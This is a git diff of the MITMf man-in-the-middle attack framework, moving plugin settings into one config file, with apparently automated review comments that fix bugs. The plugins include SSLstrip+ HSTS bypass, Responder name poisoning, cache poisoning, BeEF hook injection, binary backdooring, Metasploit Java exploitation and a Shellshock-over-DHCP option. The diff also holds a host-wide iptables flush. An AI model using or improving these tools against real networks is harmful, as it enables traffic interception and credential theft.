+    global Exe_On_Off; Exe_On_Off = config['HTTP Server']['Serve-Exe'].upper()
+    global Exec_Mode_On_Off; Exec_Mode_On_Off = config['HTTP Server']['Serve-Always'].upper()
+    global FILENAME; FILENAME = config['HTTP Server']['Filename']
+    global WPAD_Script; WPAD_Script = config['HTTP Server']['WPADScript']
+    #HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
+
+    global SSLcert; SSLcert = config['HTTPS Server']['cert']
+    global SSLkey; SSLkey = config['HTTPS Server']['key']
+
+    global RespondTo; RespondTo = config['RespondTo'].strip()
+    RespondTo.split(",")
+    global RespondToName; RespondToName = config['RespondToName'].strip()
+    RespondToName.split(",")
+    global DontRespondTo; DontRespondTo = config['DontRespondTo'].strip()
+    DontRespondTo.split(",")
+    global DontRespondToName; DontRespondToName = config['DontRespondToName'].strip()
+    DontRespondToName.split(",")
+
+    HTMLToServe = ''
+
+    if len(NumChal) is not 16:
+        sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
+
+    # Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
+    global Challange; Challenge = ""
+    for i in range(0,len(NumChal),2):
+        Challenge += NumChal[i:i+2].decode("hex")
     #Cli options.
     global OURIP; OURIP = ip_address
diff --git a/libs/sslstrip/URLMonitor.py b/libs/sslstrip/URLMonitor.py
index 03acacd..794be83 100644
--- a/libs/sslstrip/URLMonitor.py
+++ b/libs/sslstrip/URLMonitor.py
@@ -18,7 +18,6 @@
 import re, os
 import logging
-from configobj import ConfigObj
 class URLMonitor:
@@ -44,12 +43,7 @@ class URLMonitor:
         self.redirects = []
         self.faviconReplacement = False
         self.hsts = False
-
-        hsts_config = ConfigObj("./config/hsts_bypass.cfg")
-
-        for k,v in hsts_config.items():
-            self.sustitucion[k] = v
-            self.real[v] = k
+        self.hsts_config = None
     def isSecureLink(self, client, url):
         for expression in URLMonitor.javascriptTrickery:
@@ -138,9 +132,19 @@ class URLMonitor:
         self.strippedURLs.add((client, url))
         self.strippedURLPorts[(client, url)] = int(port)
-    def setValues(self, faviconSpoofing, hstsbypass=False, clientLogging=False,):
+    def setFaviconSpoofing(self, faviconSpoofing):
         self.faviconSpoofing = faviconSpoofing
-        self.hsts = hstsbypass
+
+    def setHstsBypass(self, hstsconfig):
+        if hstsconfig:
+            self.hsts = True
+            self.hsts_config = hstsconfig
+
+            for k,v in self.hsts_config.items():
+                self.sustitucion[k] = v
+                self.real[v] = k
+
+    def setClientLogging(self, clientLogging):
         self.clientLogging = clientLogging
     def isFaviconSpoofing(self):
diff --git a/mitmf.py b/mitmf.py
index fbea901..c9fdad5 100755
--- a/mitmf.py
+++ b/mitmf.py
@@ -15,7 +15,7 @@ except:
     sys.exit("[-] user_agents library not installed!")
 try:
-    import configobj
+    from configobj import ConfigObj
 except:
     sys.exit("[-] configobj library not installed!")
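Review bot: `global Challange; Challenge = ""` declares a misspelled name, so `Challenge` becomes a local of `start_responder` and the module-level `Challenge` that the deleted top-level loop used to provide is never assigned; whatever reads it elsewhere in the file will hit a `NameError` at first use (the readers are not visible here, but the old module-level definition implies they exist). The fix is `global Challenge; Challenge = ""`. `HTMLToServe = ''` has the same problem in a quieter form — it was module-level before this commit and is now a local that vanishes when the function returns — so `global HTMLToServe; HTMLToServe = ''` if other code reads it. `if len(NumChal) is not 16:` compares ints by identity and should be `if len(NumChal) != 16:`, and the bare `RespondTo.split(",")` statements discard their result, leaving those variables as plain strings exactly as before. `start_responder` continues past the end of the hunk.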
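Review bot: `setHstsBypass` fills the reverse map with a plain `self.real[v] = k`, so when two real hosts map to the same substitute (the config added in this same commit does exactly that: `www.facebook.com` and `facebook.com` both become `social.facebook.com`) the earlier mapping is silently overwritten and that host can no longer be translated back. Since `logging` is already imported here, a collision should at least be reported before the assignment: `if v in self.real and self.real[v] != k: logging.warning("HSTS bypass: %s already maps back to %s, ignoring %s" % (v, self.real[v], k))`. Calling `setHstsBypass` a second time accumulates entries rather than replacing them, which may be intended but deserves a line in a docstring. Removing `setValues` is an interface change; any caller outside this file still using it would break, which I cannot confirm from here.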
@@ -29,21 +29,23 @@ sergio_version = "0.2.1" if __name__ == "__main__": parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') + #add MITMf options + mgroup = parser.add_argument_group("MITMf", "Options for MITMf") + mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") + mgroup.add_argument("-i", "--interface", type=str, metavar="interface" ,help="Interface to listen on") + mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.cfg", metavar='configfile', help="Specify config file to use") + mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies') #add sslstrip options - sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library") + sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library") #sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).") - sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") slogopts = sgroup.add_mutually_exclusive_group() slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. 
(default)") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.") #slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet - sgroup.add_argument("-i", "--interface", type=str, required=True, metavar="interface" ,help="Interface to listen on") sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") - sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy') - sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass") #Initialize plugins plugins = [] @@ -69,6 +71,23 @@ if __name__ == "__main__": args = parser.parse_args() + try: + configfile = ConfigObj(args.configfile) + except Exception, e: + sys.exit("[-] Error parsing config file: " + str(e)) + + config_args = configfile['MITMf']['args'] + if config_args: + print "[*] Loading arguments from config file" + for arg in config_args.split(' '): + sys.argv.append(arg) + args = parser.parse_args() + + if not args.interface: + sys.exit("[-] -i , --interface argument is required") + + args.configfile = configfile #so we can pass the configobj down to all the plugins + log_level = logging.__dict__[args.log_level.upper()] #Start logging 
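Review bot: `ConfigObj(args.configfile)` does not raise for a missing file by default — it returns an empty config — so a mistyped `-c` path passes the `try` and dies on `configfile['MITMf']` with a bare KeyError; pass `file_error=True` and move that lookup inside the `try`. `config_args.split(' ')` yields empty-string arguments on double spaces and cannot carry quoted values; `shlex.split(config_args)` handles both. Because the file's arguments are appended after the real command line and re-parsed, a value in the config file overrides the one the user typed for the same option — the usual expectation is the reverse, so either insert them ahead of the CLI arguments (`sys.argv[1:1] = shlex.split(config_args)`) or document the precedence. Reassigning `args.configfile` from a path string to the parsed object also changes the attribute's meaning; a separate name such as `args.config` would keep both.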
@@ -84,7 +103,7 @@ if __name__ == "__main__": print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version if ('--responder' and '--wpad') in sys.argv: args.listen = 3141 - print "[*] Listening on port 3141 since --wpad was passed" + print "[*] SSLstrip is now listening on port 3141 since --wpad was passed" load = [] try: @@ -103,7 +122,7 @@ if __name__ == "__main__": from libs.sslstrip.StrippingProxy import StrippingProxy from libs.sslstrip.URLMonitor import URLMonitor - URLMonitor.getInstance().setValues(args.favicon, args.hsts) + URLMonitor.getInstance().setFaviconSpoofing(args.favicon) CookieCleaner.getInstance().setEnabled(args.killsessions) ProxyPlugins.getInstance().setPlugins(load) diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py index 670633d..ed6436f 100644 --- a/plugins/AppCachePoison.py +++ b/plugins/AppCachePoison.py @@ -1,15 +1,14 @@ -# + # 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz -####################################################################################################### from plugins.plugin import Plugin from datetime import date from libs.sslstrip.URLMonitor import URLMonitor import logging -import ConfigParser import re import os.path import time +import sys class AppCachePlugin(Plugin): name = "App Cache Poison" 
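Review bot: The condition on the context line just above the reworded message, `if ('--responder' and '--wpad') in sys.argv`, evaluates `('--responder' and '--wpad')` to the single string `'--wpad'`, so the port switch and this message fire whenever `--wpad` is present, with or without Responder; write `if '--responder' in sys.argv and '--wpad' in sys.argv:`. Since the commit is rewording the message this condition prints, it is the right moment to correct the test it depends on.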
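Review bot: Replacing `setValues(args.favicon, args.hsts)` with `setFaviconSpoofing(args.favicon)` drops the `clientLogging=False` default the old call supplied, and nothing in the updated mitmf.py calls the new `setClientLogging`, so `URLMonitor.clientLogging` is only defined if the class's `__init__` sets it — confirm that, or add `URLMonitor.getInstance().setClientLogging(False)` here. Since the HSTS flag now arrives through the plugin instead of this line, a comment `# HSTS bypass is enabled by the SSLstrip+ plugin via URLMonitor.setHstsBypass` would save the next reader a search.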
@@ -21,24 +20,15 @@ class AppCachePlugin(Plugin): def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options - self.config_file = "./config/app_cache_poison.cfg" - self.config = None self.mass_poisoned_browsers = [] self.urlMonitor = URLMonitor.getInstance() + try: + self.config = options.configfile['AppCachePoison'] + except Exception, e: + sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e)) + print "[*] App Cache Poison plugin online" - self.createTamperer(self.config_file) - - def parseConfig(self, configFile): - config = ConfigParser.ConfigParser() - config.read(configFile) - readConfig = config._sections - readConfig.update(config.defaults()) - return readConfig - - def createTamperer(self, configFile): - logging.debug("Reading tamper config file: %s" % (configFile)) - self.config = self.parseConfig(configFile) def handleResponse(self, request, data): @@ -55,12 +45,12 @@ class AppCachePlugin(Plugin): urls = self.urlMonitor.getRedirectionSet(url) - (s,element,url) = self.getSectionForUrls(urls) - if not s: + (name,s,element,url) = self.getSectionForUrls(urls) + if s is False: data = self.tryMassPoison(url, data, headers, req_headers, ip) return {'request': request, 'data': data} - logging.debug("Found URL %s in section %s" % (url, s['__name__'])) + logging.debug("Found URL %s in section %s" % (url, name)) p = self.getTemplatePrefix(s) if element == 'tamper': logging.debug("Poisoning tamper URL with template %s" % (p)) 
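Review bot: The removed `parseConfig` merged `config.defaults()` into the section dictionary, so keys the old file kept under `[DEFAULT]` (`templates_path`, `mass_poison_url_match`, `mass_poison_useragent_match`) were visible at top level; ConfigObj does not merge a `[DEFAULT]` section into other sections, so `self.config['templates_path']` (read later in this file) only works if the new `[AppCachePoison]` section defines those keys directly — verify against config/mitmf.cfg, which is not in this chunk. The `except Exception` around a single dictionary lookup can only see `KeyError`; narrowing it to `except KeyError, e:` states the intent and keeps an unrelated error from being reported as a missing section.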
@@ -160,12 +150,12 @@ class AppCachePlugin(Plugin): def getTemplatePrefix(self, section): if section.has_key('templates'): - return self.config['templates_path'] + '/' + section['templates'] - + return self.config['templates_path'] + '/' + section['templates'] + return self.getDefaultTemplatePrefix() def getDefaultTemplatePrefix(self): - return self.config['templates_path'] + '/default' + return self.config['templates_path'] + '/default' def getManifestUrl(self, section): return section.get("manifest_url",'/robots.txt') @@ -175,15 +165,16 @@ class AppCachePlugin(Plugin): for i in self.config: if isinstance(self.config[i], dict): #section section = self.config[i] + name = i if section.get('tamper_url',False) == url: - return (section, 'tamper',url) + return (name, section, 'tamper',url) if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url): - return (section, 'tamper',url) + return (name, section, 'tamper',url) if section.get('manifest_url',False) == url: - return (section, 'manifest',url) + return (name, section, 'manifest',url) if section.get('raw_url',False) == url: - return (section, 'raw',url) + return (name, section, 'raw',url) - return (False,'',urls.copy().pop()) + return (None, False,'',urls.copy().pop()) diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index 545502d..ca31bd4 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -9,11 +9,6 @@ import json import threading import libs.beefapi as beefapi -try: - from configobj import ConfigObj -except: - sys.exit('[-] configobj library not installed!') - requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message requests_log.setLevel(logging.WARNING) 
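Review bot: `getSectionForUrls` now returns a four-tuple but nothing documents it; add `"""Return (section_name, section, kind, url) for the first config section matching one of urls, or (None, False, '', <one url>) when none matches."""`. `re.search(section['tamper_url_match'], url)` is evaluated for every section on every response; `re` caches patterns, but compiling each `tamper_url_match` once in `initialize` and catching `re.error` there would surface a bad pattern at startup rather than mid-traffic. `section.has_key(...)` is Python 2 only — `'tamper_url_match' in section` reads the same and ports cleanly. The fallback `urls.copy().pop()` raises KeyError on an empty set, so if `getRedirectionSet` can return one the caller needs an explicit check.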
@@ -25,10 +20,17 @@ class BeefAutorun(Inject, Plugin): desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" def initialize(self, options): - self.options = options + self.options = options - beefconfig = ConfigObj("./config/mitmf.cfg")['BeEF'] - userconfig = ConfigObj("./config/beefautorun.cfg") + try: + beefconfig = options.configfile['MITMf']['BeEF'] + except Exception, e: + sys.exit("[-] Error parsing BeEF options in config file: " + str(e)) + + try: + userconfig = options.configfile['BeEFAutorun'] + except Exception, e: + sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e)) self.Mode = userconfig['mode'] self.All_modules = userconfig["ALL"] diff --git a/plugins/CacheKill.py b/plugins/CacheKill.py index ad130a4..646815a 100644 --- a/plugins/CacheKill.py +++ b/plugins/CacheKill.py @@ -2,7 +2,7 @@ from plugins.plugin import Plugin class CacheKill(Plugin): - name = "CacheKill Plugin" + name = "CacheKill" optname = "cachekill" desc = "Kills page caching by modifying headers" implements = ["handleHeader", "connectionMade"] diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py index 7f42365..7398a8d 100644 --- a/plugins/FilePwn.py +++ b/plugins/FilePwn.py @@ -88,7 +88,7 @@ class FilePwn(Plugin): #NOT USED NOW #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) - self.userConfig = ConfigObj("./config/filepwn.cfg") + self.userConfig = options.configfile['FilePwn'] self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] diff --git a/plugins/Inject.py b/plugins/Inject.py index 07d441f..db4c54c 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py 
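Review bot: The two `try` blocks guard only the section lookups; `userconfig['mode']` and `userconfig["ALL"]` on the following lines are read outside them, so a `[BeEFAutorun]` section missing either key still ends in a raw KeyError traceback. Either extend the second `try` to cover those reads or check the keys explicitly before use, and narrow `except Exception` to `except KeyError` since a dictionary lookup raises nothing else. The method continues past the end of the hunk.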
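Review bot: `self.userConfig = options.configfile['FilePwn']` is the only config lookup in this commit not wrapped in `try`/`sys.exit`, so a config file without a `[FilePwn]` section produces an unhandled KeyError traceback from inside `initialize`, unlike every other plugin; mirror them with `try: self.userConfig = options.configfile['FilePwn']` / `except KeyError, e: sys.exit("[-] Error parsing config for FilePwn: " + str(e))`. ConfigObj returns every value as a string, so `FileSizeMax` needs `int()` before it is compared with a file size — that comparison is outside the hunk, so confirm it converts. The method continues beyond the hunk.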
@@ -3,6 +3,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Er from scapy.all import get_if_addr import time import re +import sys import argparse from plugins.plugin import Plugin from plugins.CacheKill import CacheKill diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py index eea0f61..68c0c2a 100644 --- a/plugins/JavaPwn.py +++ b/plugins/JavaPwn.py @@ -9,7 +9,6 @@ import sys import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import get_if_addr -from configobj import ConfigObj requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message requests_log.setLevel(logging.WARNING) @@ -26,8 +25,15 @@ class JavaPwn(BrowserProfiler, Plugin): self.options = options self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit - msfcfg = ConfigObj('./config/mitmf.cfg')['Metasploit'] - self.javacfg = ConfigObj('./config/javapwn.cfg') + try: + msfcfg = options.configfile['MITMf']['Metasploit'] + except Exception, e: + sys.exit("[-] Error parsing Metasploit options in config file : " + str(e)) + + try: + self.javacfg = options.configfile['JavaPwn'] + except Exception, e: + sys.exit("[-] Error parsing config for JavaPwn: " + str(e)) self.msfport = msfcfg['msfport'] self.rpcip = msfcfg['rpcip'] diff --git a/plugins/Responder.py b/plugins/Responder.py index b0e2a3a..07fb673 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -23,6 +23,11 @@ class Responder(Plugin): if os.geteuid() != 0: sys.exit("[-] Responder plugin requires root privileges") + try: + config = options.configfile['Responder'] + except Exception, e: + sys.exit('[-] Error parsing config for Responder: ' + str(e)) + try: self.ip_address = get_if_addr(options.interface) if self.ip_address == "0.0.0.0": 
@@ -32,16 +37,16 @@ class Responder(Plugin): print "[*] Responder plugin online" DnsCache.getInstance().setCustomAddress(self.ip_address) - DnsCache.getInstance().setCustomRes('wpad', self.ip_address) - DnsCache.getInstance().setCustomRes('ISAProxySrv', self.ip_address) - DnsCache.getInstance().setCustomRes('RespProxySrv', self.ip_address) + + for name in ['wpad', 'ISAProxySrv', 'RespProxySrv']: + DnsCache.getInstance().setCustomRes(name, self.ip_address) if '--spoof' not in sys.argv: print '[*] Setting up iptables' os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % options.listen) - t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address)) + t = threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address, config)) t.setDaemon(True) t.start() diff --git a/plugins/SMBAuth.py b/plugins/SMBAuth.py index 64c55ce..9ca19e1 100644 --- a/plugins/SMBAuth.py +++ b/plugins/SMBAuth.py @@ -1,5 +1,9 @@ from plugins.plugin import Plugin from plugins.Inject import Inject +import sys +import logging +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy +from scapy.all import get_if_addr class SMBAuth(Inject, Plugin): 
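Review bot: `start_responder` now runs in a daemon thread and, per the libs hunk earlier in this diff, calls `sys.exit` when `config['Challenge']` is not 16 characters; `SystemExit` raised in a non-main thread only ends that thread, so a bad challenge leaves the plugin printing "online" while Responder is silently not running. Validate the value in `initialize` before `t.start()`, e.g. `if len(config['Challenge']) != 16: sys.exit("[-] Responder Challenge must be exactly 16 hex chars")`, so the failure is visible to the operator. The `iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X` on the context lines still flushes every chain on the host rather than only adding the redirect rule, which the plugin description should warn about.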
@@ -11,10 +15,19 @@ class SMBAuth(Inject, Plugin): Inject.initialize(self, options) self.target_ip = options.host self.html_payload = self._get_data() + + if self.target_ip is None: + try: + self.target_ip = get_if_addr(options.interface) + if self.target_ip == "0.0.0.0": + sys.exit("[-] Interface %s does not have an IP address" % options.interface) + except Exception, e: + sys.exit("[-] Error retrieving interface IP address: %s" % e) + print "[*] SMBAuth plugin online" def add_options(self, options): - options.add_argument("--host", type=str, help="The ip address of your capture server") + options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]") def _get_data(self): return ''\ diff --git a/plugins/SSLstrip+.py b/plugins/SSLstrip+.py new file mode 100644 index 0000000..07cc820 --- /dev/null +++ b/plugins/SSLstrip+.py @@ -0,0 +1,20 @@ +from plugins.plugin import Plugin +from libs.sslstrip.URLMonitor import URLMonitor +import sys + +class HSTSbypass(Plugin): + name = 'SSLstrip+' + optname = 'hsts' + desc = 'Enables SSLstrip+ for partial HSTS bypass' + has_opts = False + + def initialize(self, options): + self.options = options + + try: + config = options.configfile['SSLstrip+'] + except Exception, e: + sys.exit("[-] Error parsing config for SSLstrip+: " + str(e)) + + print "[*] SSLstrip+ plugin online" + URLMonitor.getInstance().setHstsBypass(config) diff --git a/plugins/Spoof.py b/plugins/Spoof.py index 57f154e..c991cdd 100644 --- a/plugins/Spoof.py +++ b/plugins/Spoof.py @@ -20,7 +20,6 @@ from base64 import b64decode from urllib import unquote import binascii import random -from configobj import ConfigObj class Spoof(Plugin): @@ -93,7 +92,7 @@ class Spoof(Plugin): self.rand_number = [] self.dhcp_dic = {} - self.dhcpcfg = ConfigObj("./config/dhcp.cfg") + self.dhcpcfg = options.configfile['Spoof']['DHCP'] thread_target = self.dhcp_sniff thread_args = () 
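Review bot: `self.html_payload = self._get_data()` runs before the new fallback assigns the interface IP to `self.target_ip`; if `_get_data` (whose body runs past the end of the hunk) embeds `self.target_ip` in the payload, the default case emits `None` where the capture address belongs. Move the `self.html_payload = self._get_data()` line below the `if self.target_ip is None:` block. The fallback duplicates the Responder plugin's interface lookup; a shared helper would keep the two from drifting.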
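Review bot: The file is named `SSLstrip+.py`, and `+` is not valid in a Python module name, so this plugin cannot be found by `import` or package-style discovery; it only loads if the plugin loader reads files by path (not visible here) — confirm that, or rename the file to `SSLstripPlus.py` and keep `name = 'SSLstrip+'` for display. `except Exception, e:` around a single dictionary lookup should be `except KeyError, e:`. A class docstring would help: `"""Enable SSLstrip+ (partial HSTS bypass) by handing the [SSLstrip+] host-substitution mapping to URLMonitor."""`.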
@@ -109,9 +108,9 @@ class Spoof(Plugin): print "[*] DNS Tampering enabled" if self.dns: - self.dnscfg = ConfigObj("./config/dns.cfg") + self.dnscfg = options.configfile['Spoof']['DNS'] - self.hstscfg = ConfigObj("./config/hsts_bypass.cfg") + self.hstscfg = options.configfile['SSLstrip+'] if not self.manualiptables: os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE') @@ -334,7 +333,7 @@ class Spoof(Plugin): group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects') group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers') options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries') - options.add_argument('--shellshock', type=str, dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') + options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command') options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]') options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
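Review bot: `self.hstscfg = options.configfile['SSLstrip+']` is read inside the `if self.dns:` branch whether or not the SSLstrip+ plugin is enabled, so `--dns` alone appears to pull the HSTS substitution map into DNS spoofing (how `self.hstscfg` is consumed lies outside the hunk — confirm). If that is intended, say so: `# DNS answers for hosts in the [SSLstrip+] map are rewritten even when the SSLstrip+ plugin is off`; if not, gate the read on the plugin's option (`optname = 'hsts'`). The method continues beyond the hunk.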